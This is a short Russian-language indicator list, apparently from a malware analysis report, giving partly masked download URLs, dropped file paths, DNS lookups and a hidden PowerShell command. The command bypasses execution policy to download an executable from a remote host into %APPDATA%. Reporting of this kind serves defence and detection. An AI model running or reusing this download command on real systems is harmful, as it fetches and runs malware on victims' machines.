Техническая информация
- http://sa#######e-ibmcloud.kozow.com/dlmwptb_signed_tw.exe как %appdata%\dlmwptb_signed_tw.exe
- ieinstal.exe
- %TEMP%\abctfhghgdghghž.sct
- %APPDATA%\dlmwptb_signed_tw.exe
- http://sa#######e-ibmcloud.kozow.com/dlmwptb_Signed_tw.exe
- http://sp#######nce-cloud.gleeze.com/buts/71qWCcTcD1gIFZIEsa2yFFvgXpYFs50JT6ukG/dbvg
- DNS ASK sa#######e-ibmcloud.kozow.com
- DNS ASK sp#######nce-cloud.gleeze.com
- DNS ASK lo#g.af
- '%APPDATA%\dlmwptb_signed_tw.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://sa#######e-ibmcloud.kozow.com/dlmwptb_Signed_tw.exe','%APPDATA%\dlmwpt...' (со скрытым окном)
- '%ProgramFiles(x86)%\internet explorer\ieinstal.exe'